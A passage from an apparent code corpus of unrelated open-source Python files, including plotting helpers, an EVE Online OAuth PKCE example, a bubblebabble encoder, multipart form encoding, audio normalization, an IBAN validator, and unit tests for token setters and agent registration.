plot_kwargs["color"] = color
if y_hat_line_kwargs is None:
y_hat_line_kwargs = {}
y_hat_line_kwargs.setdefault("color", "k")
if exp_events_kwargs is None:
exp_events_kwargs = {}
exp_events_kwargs.setdefault("color", "k")
exp_events_kwargs.setdefault("marker", "^")
exp_events_kwargs.setdefault("s", 100)
exp_events_kwargs.setdefault("zorder", 2)
backend_kwargs = {
**backend_kwarg_defaults(),
**backend_kwargs,
}
(figsize, *_) = _scale_fig_size(figsize, textsize, 1, 1)
backend_kwargs.setdefault("figsize", figsize)
backend_kwargs["squeeze"] = True
if ax is None:
_, ax = create_axes_grid(1, backend_kwargs=backend_kwargs)
idx = np.argsort(y_hat)
for i, loc in enumerate(locs):
positive = not y[idx][i] == 0
alpha = 1 if positive else 0.3
ax.bar(loc, 1, width=width, alpha=alpha, **plot_kwargs)
if y_hat_line:
ax.plot(np.linspace(0, 1, len(y_hat)), y_hat[idx], label=label_y_hat, **y_hat_line_kwargs)
if expected_events:
expected_events = int(np.round(np.sum(y_hat)))
ax.scatter(
y_hat[idx][len(y_hat) - expected_events - 1],
0,
label="Expected events",
**exp_events_kwargs
)
if legend and (expected_events or y_hat_line):
handles, labels = ax.get_legend_handles_labels()
labels_dict = dict(zip(labels, handles))
ax.legend(labels_dict.values(), labels_dict.keys())
ax.set_xticks([])
ax.set_yticks([])
ax.set_xlim(0, 1)
ax.set_ylim(0, 1)
if backend_show(show):
plt.show()
return ax
|
Examples/Image/Detection/FastRCNN/BrainScript/B3_VisualizeOutputROIs.py | shyamalschandra/CNTK | 17,702 | 31559 | <filename>Examples/Image/Detection/FastRCNN/BrainScript/B3_VisualizeOutputROIs.py
# Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE.md file in the project root
# for full license information.
# ==============================================================================
from __future__ import print_function
import os, importlib, sys
from cntk_helpers import imWidthHeight, nnPredict, applyNonMaximaSuppression, makeDirectory, visualizeResults, imshow
import PARAMETERS
####################################
# Parameters
####################################
image_set = 'test' # 'train', 'test'
def visualize_output_rois(testing=False):
p = PARAMETERS.get_parameters_for_dataset()
# no need to change these parameters
boUseNonMaximaSurpression = True
visualizationDir = os.path.join(p.resultsDir, "visualizations")
cntkParsedOutputDir = os.path.join(p.cntkFilesDir, image_set + "_parsed")
makeDirectory(p.resultsDir)
makeDirectory(visualizationDir)
# loop over all images and visualize
imdb = p.imdbs[image_set]
for imgIndex in range(0, imdb.num_images):
imgPath = imdb.image_path_at(imgIndex)
imgWidth, imgHeight = imWidthHeight(imgPath)
# evaluate classifier for all rois
labels, scores = nnPredict(imgIndex, cntkParsedOutputDir, p.cntk_nrRois, len(p.classes), None)
# remove the zero-padded rois
scores = scores[:len(imdb.roidb[imgIndex]['boxes'])]
labels = labels[:len(imdb.roidb[imgIndex]['boxes'])]
        # perform non-maxima suppression. note that the detected classes in the image are not affected by this.
nmsKeepIndices = []
if boUseNonMaximaSurpression:
nmsKeepIndices = applyNonMaximaSuppression(p.nmsThreshold, labels, scores, imdb.roidb[imgIndex]['boxes'])
            print ("Non-maxima suppression kept {:4} of {:4} rois (nmsThreshold={})".format(len(nmsKeepIndices), len(labels), p.nmsThreshold))
# visualize results
imgDebug = visualizeResults(imgPath, labels, scores, imdb.roidb[imgIndex]['boxes'], p.cntk_padWidth, p.cntk_padHeight,
p.classes, nmsKeepIndices, boDrawNegativeRois=True)
if not testing:
imshow(imgDebug, waitDuration=0, maxDim = 800)
# imwrite(imgDebug, visualizationDir + "/" + str(imgIndex) + os.path.basename(imgPath))
print ("DONE.")
return True
if __name__=='__main__':
visualize_output_rois()
|
src/deepke/name_entity_re/__init__.py | johncolezhang/DeepKE | 710 | 31560 | from .standard import *
from .few_shot import *
|
recipes/Python/299133_bubblebabble/recipe-299133.py | tdiprima/code | 2,023 | 31562 | #! /usr/bin/env python
"""Compute a (somewhat more) human readable format for message
digests. This is a port of the perl module Digest-BubbleBabble-0.01
(http://search.cpan.org/~btrott/Digest-BubbleBabble-0.01/)
"""
vowels = "aeiouy"
consonants = "bcdfghklmnprstvzx"
def bubblebabble(digest):
"""compute bubblebabble representation of digest.
@param digest: raw string representation of digest (e.g. what md5.digest returns)
@type digest: str
@return: bubblebabble representation of digest
@rtype: str
"""
digest = [ord(x) for x in digest]
dlen = len(digest)
seed = 1
rounds = 1+dlen/2
retval = "x"
for i in range(rounds):
if i+1<rounds or dlen % 2:
idx0 = (((digest[2*i] >> 6) & 3) + seed) % 6
idx1 = (digest[2*i] >> 2) & 15;
idx2 = ((digest[2*i] & 3) + seed / 6) % 6;
retval += "%s%s%s" % (vowels[idx0], consonants[idx1], vowels[idx2])
if i+1 < rounds:
idx3 = (digest[2 * i + 1] >> 4) & 15;
idx4 = digest[2 * i + 1] & 15;
retval += "%s-%s" % (consonants[idx3], consonants[idx4])
seed = (seed * 5 + digest[2*i] * 7 +
digest[2*i+1]) % 36;
else:
idx0 = seed % 6;
idx1 = 16;
idx2 = seed / 6;
retval += "%s%s%s" % (vowels[idx0], consonants[idx1], vowels[idx2])
retval += "x"
return retval
def hexstring2string(s):
"""convert hex representation of digest back to raw digest"""
assert (len(s) % 2 == 0)
if s.startswith("0x") or s.startswith("0X"):
s = s[2:]
    return "".join([chr(int(s[i:i+2], 16)) for i in range(0, len(s), 2)])
def _test():
tests = """432cc46b5c67c9adaabdcc6c69e23d6d xibod-sycik-rilak-lydap-tipur-tifyk-sipuv-dazok-tixox
5a1edbe07020525fd28cba1ea3b76694 xikic-vikyv-besed-begyh-zagim-sevic-vomer-lunon-gexex
1c453603cdc914c1f2eeb1abddae2e03 xelag-hatyb-fafes-nehys-cysyv-vasop-rylop-vorab-fuxux
df8ec33d78ae78280e10873f5e58d5ad xulom-vebyf-tevyp-vevid-mufic-bucef-zylyh-mehyp-tuxax
02b682a73739a9fb062370eaa8bcaec9 xebir-kybyp-latif-napoz-ricid-fusiv-popir-soras-nixyx"""
# ...as computed by perl
tests = [x.split()[:2] for x in tests.split("\n")]
for digest, expected in tests:
res=bubblebabble(hexstring2string(digest))
print digest, res, ("failure", "ok")[expected==res]
if __name__=="__main__":
_test()
|
examples/python/sso/esi_oauth_native.py | Dusty-Meg/esi-docs | 130 | 31565 | <reponame>Dusty-Meg/esi-docs<gh_stars>100-1000
""" Python 3 native (desktop/mobile) OAuth 2.0 example.
This example can be run from the command line and will show you how the
OAuth 2.0 flow should be handled if you are a web based application.
Prerequisites:
* Create an SSO application at developers.eveonline.com with the scope
"esi-characters.read_blueprints.v1" and the callback URL
"https://localhost/callback/". Note: never use localhost as a callback
in released applications.
* Have a Python 3 environment available to you (possibly by using a
virtual environment: https://virtualenv.pypa.io/en/stable/).
* Run pip install -r requirements.txt with this directory as your root.
To run this example, make sure you have completed the prerequisites and then
run the following command from this directory as the root:
>>> python esi_oauth_native.py
then follow the prompts.
"""
import base64
import hashlib
import secrets
from shared_flow import print_auth_url
from shared_flow import send_token_request
from shared_flow import handle_sso_token_response
def main():
""" Takes you through a local example of the OAuth 2.0 native flow."""
print("This program will take you through an example OAuth 2.0 flow "
"that you should be using if you are building a desktop or mobile "
"application. Follow the prompts and enter the info asked for.")
# Generate the PKCE code challenge
random = base64.urlsafe_b64encode(secrets.token_bytes(32))
m = hashlib.sha256()
m.update(random)
d = m.digest()
code_challenge = base64.urlsafe_b64encode(d).decode().replace("=", "")
client_id = input("Copy your SSO application's client ID and enter it "
"here: ")
print("\nBecause this is a desktop/mobile application, you should use "
"the PKCE protocol when contacting the EVE SSO. In this case, that "
"means sending a base 64 encoded sha256 hashed 32 byte string "
"called a code challenge. This 32 byte string should be ephemeral "
"and never stored anywhere. The code challenge string generated for "
"this program is {} and the hashed code challenge is {}. \nNotice "
"that the query parameter of the following URL will contain this "
"code challenge.".format(random, code_challenge))
input("\nPress any key to continue:")
print_auth_url(client_id, code_challenge=code_challenge)
auth_code = input("Copy the \"code\" query parameter and enter it here: ")
code_verifier = random
form_values = {
"grant_type": "authorization_code",
"client_id": client_id,
"code": auth_code,
"code_verifier": code_verifier
}
    print("\nBecause this is using the PKCE protocol, your application never has "
"to share its secret key with the SSO. Instead, this next request "
"will send the base 64 encoded unhashed value of the code "
"challenge, called the code verifier, in the request body so EVE's "
"SSO knows your application was not tampered with since the start "
"of this process. The code verifier generated for this program is "
"{} derived from the raw string {}".format(code_verifier, random))
input("\nPress any key to continue:")
res = send_token_request(form_values)
handle_sso_token_response(res)
if __name__ == "__main__":
main()
|
examples/resourcetracking/client.py | brubbel/Pyro4 | 638 | 31567 | <filename>examples/resourcetracking/client.py
from __future__ import print_function
import sys
import random
import Pyro4
if sys.version_info < (3, 0):
input = raw_input
uri = input("Enter the URI of the server object: ")
with Pyro4.Proxy(uri) as proxy:
print("currently allocated resources:", proxy.list())
name1 = hex(random.randint(0, 999999))[-4:]
name2 = hex(random.randint(0, 999999))[-4:]
print("allocating resource...", name1)
proxy.allocate(name1)
print("allocating resource...", name2)
proxy.allocate(name2)
input("\nhit Enter now to continue normally or ^C/break to abort the connection forcefully:")
print("free resources normally...")
proxy.free(name1)
proxy.free(name2)
print("allocated resources:", proxy.list())
print("done.")
|
tests/unitary/ERC20CRV/test_setters.py | AqualisDAO/curve-dao-contracts | 217 | 31597 | import brownie
def test_set_minter_admin_only(accounts, token):
with brownie.reverts("dev: admin only"):
token.set_minter(accounts[2], {"from": accounts[1]})
def test_set_admin_admin_only(accounts, token):
with brownie.reverts("dev: admin only"):
token.set_admin(accounts[2], {"from": accounts[1]})
def test_set_name_admin_only(accounts, token):
with brownie.reverts("Only admin is allowed to change name"):
token.set_name("Foo Token", "FOO", {"from": accounts[1]})
def test_set_minter(accounts, token):
token.set_minter(accounts[1], {"from": accounts[0]})
assert token.minter() == accounts[1]
def test_set_admin(accounts, token):
token.set_admin(accounts[1], {"from": accounts[0]})
assert token.admin() == accounts[1]
def test_set_name(accounts, token):
token.set_name("Foo Token", "FOO", {"from": accounts[0]})
assert token.name() == "Foo Token"
assert token.symbol() == "FOO"
|
rurouni/exceptions.py | PinkDiamond1/Kenshin | 219 | 31601 | # coding: utf-8
class RurouniException(Exception):
pass
class ConfigException(RurouniException):
pass
class TokenBucketFull(RurouniException):
pass
class UnexpectedMetric(RurouniException):
pass |
release/stubs.min/System/Windows/Forms/__init___parts/ControlStyles.py | htlcnn/ironpython-stubs | 182 | 31611 | class ControlStyles(Enum,IComparable,IFormattable,IConvertible):
"""
Specifies the style and behavior of a control.
enum (flags) ControlStyles,values: AllPaintingInWmPaint (8192),CacheText (16384),ContainerControl (1),DoubleBuffer (65536),EnableNotifyMessage (32768),FixedHeight (64),FixedWidth (32),Opaque (4),OptimizedDoubleBuffer (131072),ResizeRedraw (16),Selectable (512),StandardClick (256),StandardDoubleClick (4096),SupportsTransparentBackColor (2048),UserMouse (1024),UserPaint (2),UseTextForAccessibility (262144)
"""
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self,*args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
AllPaintingInWmPaint=None
CacheText=None
ContainerControl=None
DoubleBuffer=None
EnableNotifyMessage=None
FixedHeight=None
FixedWidth=None
Opaque=None
OptimizedDoubleBuffer=None
ResizeRedraw=None
Selectable=None
StandardClick=None
StandardDoubleClick=None
SupportsTransparentBackColor=None
UserMouse=None
UserPaint=None
UseTextForAccessibility=None
value__=None
|
bin/award_ebadge_declare.py | ervikey/SA-ctf_scoreboard | 106 | 31633 | <filename>bin/award_ebadge_declare.py
# encode = utf-8
import os
import sys
import re
ta_name = 'SA-ctf_scoreboard'
ta_lib_name = 'sa_ctf_scoreboard'
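# Keep only sys.path entries that are not another app's bin directory (or that
# belong to this add-on), then put the bundled library folder first on the path.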
pattern = re.compile(r"[\\/]etc[\\/]apps[\\/][^\\/]+[\\/]bin[\\/]?$")
new_paths = [path for path in sys.path if not pattern.search(path) or ta_name in path]
new_paths.insert(0, os.path.sep.join([os.path.dirname(__file__), ta_lib_name]))
sys.path = new_paths
|
seleniumwire/thirdparty/mitmproxy/net/http/multipart.py | KozminMoci/selenium-wire | 975 | 31641 | <reponame>KozminMoci/selenium-wire
import mimetypes
import re
from urllib.parse import quote
from seleniumwire.thirdparty.mitmproxy.net.http import headers
def encode(head, l):
k = head.get("content-type")
if k:
k = headers.parse_content_type(k)
if k is not None:
try:
boundary = k[2]["boundary"].encode("ascii")
boundary = quote(boundary)
except (KeyError, UnicodeError):
return b""
hdrs = []
for key, value in l:
file_type = mimetypes.guess_type(str(key))[0] or "text/plain; charset=utf-8"
if key:
hdrs.append(b"--%b" % boundary.encode('utf-8'))
disposition = b'form-data; name="%b"' % key
hdrs.append(b"Content-Disposition: %b" % disposition)
hdrs.append(b"Content-Type: %b" % file_type.encode('utf-8'))
hdrs.append(b'')
hdrs.append(value)
hdrs.append(b'')
if value is not None:
# If boundary is found in value then raise ValueError
if re.search(rb"^--%b$" % re.escape(boundary.encode('utf-8')), value):
raise ValueError(b"boundary found in encoded string")
hdrs.append(b"--%b--\r\n" % boundary.encode('utf-8'))
temp = b"\r\n".join(hdrs)
return temp
def decode(hdrs, content):
"""
Takes a multipart boundary encoded string and returns list of (key, value) tuples.
"""
v = hdrs.get("content-type")
if v:
v = headers.parse_content_type(v)
if not v:
return []
try:
boundary = v[2]["boundary"].encode("ascii")
except (KeyError, UnicodeError):
return []
rx = re.compile(br'\bname="([^"]+)"')
r = []
if content is not None:
for i in content.split(b"--" + boundary):
parts = i.splitlines()
if len(parts) > 1 and parts[0][0:2] != b"--":
match = rx.search(parts[1])
if match:
key = match.group(1)
value = b"".join(parts[3 + parts[2:].index(b""):])
r.append((key, value))
return r
return []
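# Hedged round-trip sketch: illustrative boundary and field values; a plain dict
# stands in for mitmproxy's Headers object, since only .get() is used above.
if __name__ == "__main__":
    hdrs = {"content-type": "multipart/form-data; boundary=foobar"}
    body = encode(hdrs, [(b"field", b"value")])
    print(decode(hdrs, body))  # expected: [(b'field', b'value')]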
|
nlpaug/model/audio/normalization.py | techthiyanes/nlpaug | 3,121 | 31707 | import numpy as np
from nlpaug.model.audio import Audio
class Normalization(Audio):
def manipulate(self, data, method, start_pos, end_pos):
aug_data = data.copy()
if method == 'minmax':
new_data = self._min_max(aug_data[start_pos:end_pos])
elif method == 'max':
new_data = self._max(aug_data[start_pos:end_pos])
elif method == 'standard':
new_data = self._standard(aug_data[start_pos:end_pos])
aug_data[start_pos:end_pos] = new_data
return aug_data
def get_support_methods(self):
return ['minmax', 'max', 'standard']
def _standard(self, data):
return (data - np.mean(data)) / np.std(data)
def _max(self, data):
return data / np.amax(np.abs(data))
def _min_max(self, data):
lower = np.amin(np.abs(data))
return (data - lower) / (np.amax(np.abs(data)) - lower)
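# Worked sketch of the 'standard' branch above (standalone numpy, illustrative
# values): z-score only the [start_pos, end_pos) segment, as manipulate() does
# through _standard(), and leave the rest of the signal untouched.
if __name__ == "__main__":
    data = np.linspace(-1.0, 1.0, 10)
    start_pos, end_pos = 2, 8
    out = data.copy()
    segment = out[start_pos:end_pos]
    out[start_pos:end_pos] = (segment - np.mean(segment)) / np.std(segment)
    print(out)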
|
robogym/envs/rearrange/tests/test_object_creation.py | 0xflotus/robogym | 288 | 31766 | import numpy as np
from numpy.testing import assert_allclose
from robogym.envs.rearrange.common.utils import (
get_mesh_bounding_box,
make_block,
make_blocks_and_targets,
)
from robogym.envs.rearrange.simulation.composer import RandomMeshComposer
from robogym.mujoco.mujoco_xml import MujocoXML
def _get_default_xml():
xml_source = """
<mujoco>
<asset>
<material name="block_mat" specular="0" shininess="0.5" reflectance="0" rgba="1 0 0 1"></material>
</asset>
</mujoco>
"""
xml = MujocoXML.from_string(xml_source)
return xml
def test_mesh_composer():
for path in [
None,
RandomMeshComposer.GEOM_ASSET_PATH,
RandomMeshComposer.GEOM_ASSET_PATH,
]:
composer = RandomMeshComposer(mesh_path=path)
for num_geoms in range(1, 6):
xml = _get_default_xml()
composer.reset()
xml.append(composer.sample("object0", num_geoms, object_size=0.05))
sim = xml.build()
assert len(sim.model.geom_names) == num_geoms
pos, size = get_mesh_bounding_box(sim, "object0")
assert np.isclose(np.max(size), 0.05)
pos2, size2 = composer.get_bounding_box(sim, "object0")
assert np.allclose(pos, pos2)
assert np.allclose(size, size2)
def test_block_object():
xml = _get_default_xml()
xml.append(make_block("object0", object_size=np.ones(3) * 0.05))
sim = xml.build()
assert len(sim.model.geom_size) == 1
assert_allclose(sim.model.geom_size, 0.05)
def test_blocks_and_targets():
xml = _get_default_xml()
for obj_xml, target_xml in make_blocks_and_targets(num_objects=5, block_size=0.05):
xml.append(obj_xml)
xml.append(target_xml)
sim = xml.build()
assert len(sim.model.geom_size) == 10
assert_allclose(sim.model.geom_size, 0.05)
|
examples/tesselation.py | 2dx/moderngl | 916 | 31803 | <gh_stars>100-1000
#!/usr/bin/env python3
'''Simple example of using tessellation to render a cubic Bézier curve'''
import numpy as np
import moderngl
from ported._example import Example
class Tessellation(Example):
title = "Tessellation"
gl_version = (4, 0)
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.prog = self.ctx.program(
vertex_shader='''
#version 400 core
in vec2 in_pos;
void main() { gl_Position = vec4(in_pos, 0.0, 1.0); }
''',
tess_control_shader='''
#version 400 core
layout(vertices = 4) out;
void main() {
// set tesselation levels, TODO compute dynamically
gl_TessLevelOuter[0] = 1;
gl_TessLevelOuter[1] = 32;
// pass through vertex positions
gl_out[gl_InvocationID].gl_Position = gl_in[gl_InvocationID].gl_Position;
}
''',
tess_evaluation_shader='''
#version 400 core
layout(isolines, fractional_even_spacing, ccw) in;
// compute a point on a bezier curve with the points p0, p1, p2, p3
// the parameter u is in [0, 1] and determines the position on the curve
vec3 bezier(float u, vec3 p0, vec3 p1, vec3 p2, vec3 p3) {
float B0 = (1.0 - u) * (1.0 - u) * (1.0 - u);
float B1 = 3.0 * (1.0 - u) * (1.0 - u) * u;
float B2 = 3.0 * (1.0 - u) * u * u;
float B3 = u * u * u;
return B0 * p0 + B1 * p1 + B2 * p2 + B3 * p3;
}
void main() {
float u = gl_TessCoord.x;
vec3 p0 = vec3(gl_in[0].gl_Position);
vec3 p1 = vec3(gl_in[1].gl_Position);
vec3 p2 = vec3(gl_in[2].gl_Position);
vec3 p3 = vec3(gl_in[3].gl_Position);
gl_Position = vec4(bezier(u, p0, p1, p2, p3), 1.0);
}
''',
fragment_shader='''
#version 400 core
out vec4 frag_color;
void main() { frag_color = vec4(1.0); }
'''
)
# four vertices define a cubic Bézier curve; has to match the shaders
self.ctx.patch_vertices = 4
self.ctx.line_width = 5.0
vertices = np.array([
[-1.0, 0.0],
[-0.5, 1.0],
[0.5, -1.0],
[1.0, 0.0],
])
vbo = self.ctx.buffer(vertices.astype('f4'))
self.vao = self.ctx.simple_vertex_array(self.prog, vbo, 'in_pos')
def render(self, time, frame_time):
self.ctx.clear(0.2, 0.4, 0.7)
self.vao.render(mode=moderngl.PATCHES)
if __name__ == '__main__':
Tessellation.run()
|
tests/techniques/test_train_policy_gradient.py | alphagamatoe/AlphaToe | 172 | 31852 | <filename>tests/techniques/test_train_policy_gradient.py
import functools
from unittest import TestCase
from common.base_game_spec import BaseGameSpec
from common.network_helpers import create_network
from games.tic_tac_toe import TicTacToeGameSpec
from games.tic_tac_toe_x import TicTacToeXGameSpec
from techniques.train_policy_gradient import train_policy_gradients
class _VerySimpleGameSpec(BaseGameSpec):
def new_board(self):
return [0, 0]
def apply_move(self, board_state, move, side):
board_state[move] = side
return board_state
def has_winner(self, board_state):
return board_state[0]
def __init__(self):
pass
def available_moves(self, board_state):
return [i for i, x in enumerate(board_state) if x == 0]
def board_dimensions(self):
return 2,
class TestTrainPolicyGradient(TestCase):
def test_learn_simple_game(self):
game_spec = _VerySimpleGameSpec()
create_model_func = functools.partial(create_network, 2, (4,))
variables, win_rate = train_policy_gradients(game_spec, create_model_func, None,
learn_rate=0.1,
number_of_games=1000, print_results_every=100,
batch_size=20,
randomize_first_player=False)
self.assertGreater(win_rate, 0.9)
def test_tic_tac_toe(self):
game_spec = TicTacToeGameSpec()
create_model_func = functools.partial(create_network, game_spec.board_squares(), (100, 100, 100,))
variables, win_rate = train_policy_gradients(game_spec, create_model_func, None,
learn_rate=1e-4,
number_of_games=60000,
print_results_every=1000,
batch_size=100,
randomize_first_player=False)
self.assertGreater(win_rate, 0.4)
|
sdk/python/core/tests/test_sanity_augmentation.py | YDK-Solutions/ydk | 125 | 31854 | # ----------------------------------------------------------------
# Copyright 2016 Cisco Systems
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------
"""
test_sanity_bundle_augmentation.py
Unittest for bundle augmentation.
"""
from __future__ import absolute_import
import sys
import unittest
from ydk.services import CRUDService
from ydk.providers import NetconfServiceProvider
from ydk.models.augmentation import ietf_aug_base_1
from ydk.models.augmentation import ietf_aug_base_2
from test_utils import assert_with_error
from test_utils import ParametrizedTestCase
from test_utils import get_device_info
class SanityYang(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.ncc = NetconfServiceProvider(
cls.hostname,
cls.username,
cls.password,
cls.port,
cls.protocol,
cls.on_demand,
cls.common_cache,
cls.timeout)
cls.crud = CRUDService()
def setUp(self):
self.crud.delete(self.ncc, ietf_aug_base_1.Cpython())
self.crud.delete(self.ncc, ietf_aug_base_2.Cpython())
def tearDown(self):
self.crud.delete(self.ncc, ietf_aug_base_1.Cpython())
self.crud.delete(self.ncc, ietf_aug_base_2.Cpython())
def test_aug_base_1(self):
cpython = ietf_aug_base_1.Cpython()
cpython.doc.ydktest_aug_1.aug_one = 'aug one'
cpython.doc.ydktest_aug_2.aug_two = 'aug two'
cpython.doc.ydktest_aug_4.aug_four = 'aug four'
cpython.lib.ydktest_aug_1.ydktest_aug_nested_1.aug_one = 'aug one'
cpython.lib.ydktest_aug_2.ydktest_aug_nested_2.aug_two = 'aug two'
cpython.lib.ydktest_aug_4.ydktest_aug_nested_4.aug_four = 'aug four'
cpython.doc.disutils.four_aug_list.enabled = True
item1 = cpython.doc.disutils.four_aug_list.Ldata()
item2 = cpython.doc.disutils.four_aug_list.Ldata()
item1.name, item1.number = 'one', 1
        item2.name, item2.number = 'two', 2
self.crud.create(self.ncc, cpython)
cpython_read = self.crud.read(self.ncc, ietf_aug_base_1.Cpython())
self.assertEqual(cpython, cpython_read)
def test_aug_base_2(self):
cpython = ietf_aug_base_2.Cpython()
cpython.tools.aug_four = 'aug four'
self.crud.create(self.ncc, cpython)
cpython_read = self.crud.read(self.ncc, ietf_aug_base_2.Cpython())
self.assertEqual(cpython, cpython_read)
if __name__ == '__main__':
device, non_demand, common_cache, timeout = get_device_info()
suite = unittest.TestSuite()
suite.addTest(ParametrizedTestCase.parametrize(
SanityYang,
device=device,
non_demand=non_demand,
common_cache=common_cache,
timeout=timeout))
ret = not unittest.TextTestRunner(verbosity=2).run(suite).wasSuccessful()
sys.exit(ret)
|
getdata.py | krantirk/dash-120million-taxi-app | 103 | 31898 | <reponame>krantirk/dash-120million-taxi-app
import vaex
import os
# Open the main data
taxi_path = 's3://vaex/taxi/yellow_taxi_2012_zones.hdf5?anon=true'
# override the path, e.g. $ export TAXI_PATH=/data/taxi/yellow_taxi_2012_zones.hdf5
taxi_path = os.environ.get('TAXI_PATH', taxi_path)
df_original = vaex.open(taxi_path)
# Make sure the data is cached locally
used_columns = ['pickup_longitude',
'pickup_latitude',
'dropoff_longitude',
'dropoff_latitude',
'total_amount',
'trip_duration_min',
'trip_speed_mph',
'pickup_hour',
'pickup_day',
'dropoff_borough',
'dropoff_zone',
'pickup_borough',
'pickup_zone']
for col in used_columns:
print(f'Making sure column "{col}" is cached...')
df_original.nop(col, progress=True)
|
libs/validators/iban.py | Sparklingx/nzbhydra | 674 | 31904 | import re
from .utils import validator
regex = (
r'^[A-Z]{2}[0-9]{2}[A-Z0-9]{13,30}$'
)
pattern = re.compile(regex)
def char_value(char):
"""A=10, B=11, ..., Z=35
"""
if char.isdigit():
return int(char)
else:
return 10 + ord(char) - ord('A')
def modcheck(value):
"""Check if the value string passes the mod97-test.
"""
# move country code and check numbers to end
rearranged = value[4:] + value[:4]
# convert letters to numbers
converted = [char_value(char) for char in rearranged]
# interpret as integer
integerized = int(''.join([str(i) for i in converted]))
return (integerized % 97 == 1)
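# Worked example (illustrative only, consistent with the doctest for iban() below):
# for 'DE29100500001061045672' the steps are
#   rearranged  = '100500001061045672' + 'DE29'
#   converted   = digits unchanged, 'D' -> 13, 'E' -> 14, giving '100500001061045672131429'
#   integerized = 100500001061045672131429, and 100500001061045672131429 % 97 == 1,
# so the value passes the mod97 test.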
@validator
def iban(value):
"""
Return whether or not given value is a valid IBAN code.
If the value is a valid IBAN this function returns ``True``, otherwise
:class:`~validators.utils.ValidationFailure`.
Examples::
>>> iban('DE29100500001061045672')
True
>>> iban('123456')
ValidationFailure(func=iban, ...)
.. versionadded:: 0.8
:param value: IBAN string to validate
"""
return pattern.match(value) and modcheck(value)
|
examples/project-sourcecode/c.py | wheatdog/guildai | 694 | 31924 | <gh_stars>100-1000
from subproject import d
print("c")
|
tests/test_packages/test_skills/test_registration_aw1/test_behaviours.py | bryanchriswhite/agents-aea | 126 | 31967 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the tests of the behaviour classes of the registration_aw1 skill."""
import logging
from pathlib import Path
from unittest.mock import patch
from aea.helpers.transaction.base import RawMessage, Terms
from packages.fetchai.protocols.register.message import RegisterMessage
from packages.fetchai.protocols.signing.message import SigningMessage
from tests.conftest import ROOT_DIR
from tests.test_packages.test_skills.test_registration_aw1.intermediate_class import (
RegiatrationAW1TestCase,
)
class TestAW1Registration(RegiatrationAW1TestCase):
"""Test registration behaviour of registration_aw1."""
path_to_skill = Path(ROOT_DIR, "packages", "fetchai", "skills", "registration_aw1")
@classmethod
def setup(cls):
"""Setup the test class."""
super().setup()
    def test_setup_i(self):
        """Test the setup method of the registration behaviour when developer_handle_mode is False and announce_termination_key is None."""
# setup
self.strategy.announce_termination_key = None
self.strategy.developer_handle_mode = False
# operation
with patch.object(self.logger, "log") as mock_logger:
self.register_behaviour.setup()
# after
self.assert_quantity_in_decision_making_queue(1)
message = self.get_message_from_decision_maker_inbox()
has_attributes, error_str = self.message_has_attributes(
actual_message=message,
message_type=SigningMessage,
performative=SigningMessage.Performative.SIGN_MESSAGE,
to=self.skill.skill_context.decision_maker_address,
sender=str(self.skill.skill_context.skill_id),
raw_message=RawMessage(
self.strategy.ledger_id, self.strategy.ethereum_address.encode("utf-8")
),
terms=Terms(
ledger_id=self.strategy.ledger_id,
sender_address="",
counterparty_address="",
amount_by_currency_id={},
quantities_by_good_id={},
nonce="",
),
)
assert has_attributes, error_str
mock_logger.assert_any_call(
logging.INFO, "sending signing_msg to decision maker..."
)
    def test_setup_ii(self):
        """Test the setup method of the registration behaviour when developer_handle mode is enabled and announce_termination_key is not None."""
# setup
key = "some_key"
self.strategy.announce_termination_key = key
self.strategy.developer_handle_only = True
# operation
self.register_behaviour.setup()
# after
self.assert_quantity_in_decision_making_queue(0)
assert self.skill.skill_context.shared_state[key] is False
def test_act_i(self):
"""Test the act method of the registration behaviour where is_ready_to_register is False."""
# setup
self.strategy.is_ready_to_register = False
# operation
self.register_behaviour.act()
# after
self.assert_quantity_in_outbox(0)
def test_act_ii(self):
"""Test the act method of the registration behaviour where aw1_registration_aeas is None."""
# setup
self.strategy.is_ready_to_register = True
# operation
self.register_behaviour.act()
# after
self.assert_quantity_in_outbox(0)
def test_act_iii(self):
"""Test the act method of the registration behaviour where is_registered is True."""
# setup
self.strategy.is_ready_to_register = True
self.skill.skill_context.shared_state[
self.shared_storage_key
] = self.aw1_registration_aeas
self.strategy.is_registered = True
# operation
self.register_behaviour.act()
# after
self.assert_quantity_in_outbox(0)
def test_act_iv(self):
"""Test the act method of the registration behaviour where is_registration_pending is True."""
# setup
self.strategy.is_ready_to_register = True
self.skill.skill_context.shared_state[
self.shared_storage_key
] = self.aw1_registration_aeas
self.strategy.is_registered = False
self.strategy.is_registration_pending = True
# operation
self.register_behaviour.act()
# after
self.assert_quantity_in_outbox(0)
def test_act_v(self):
"""Test the act method of the registration behaviour where _register_for_aw1 is called."""
# setup
self.strategy.is_ready_to_register = True
self.skill.skill_context.shared_state[
self.shared_storage_key
] = self.aw1_registration_aeas
self.strategy.is_registered = False
self.strategy.is_registration_pending = False
# operation
with patch.object(self.logger, "log") as mock_logger:
